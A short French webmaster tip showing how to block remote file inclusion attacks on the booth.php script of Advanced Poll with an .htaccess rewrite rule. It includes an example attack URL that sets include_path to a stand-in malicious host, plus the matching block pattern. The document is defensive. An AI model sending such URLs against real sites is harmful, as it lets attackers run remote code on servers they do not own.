HTACCESS

Bloquer les hackers utilisant le script booth.php

Les attaques par inclusion de fichier php distant sont nombreuses et les pirates d'internet en profitent.

Le script booth.php présent dans Advanced Poll (PHP) permet d'inclure du code ne se trouvant pas sur votre serveur si register_globals vaut OFF.

Le paramètre include_path est utilisé pour définir un chemin d'include distant.

Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com/booth.php?include_path=http://www.sitepourri.com/page.txt?

RewriteCond %{QUERY_STRING} ^(.*&)?include_path=http://
RewriteRule ^(.*/)?booth.php - [F,L]
PHP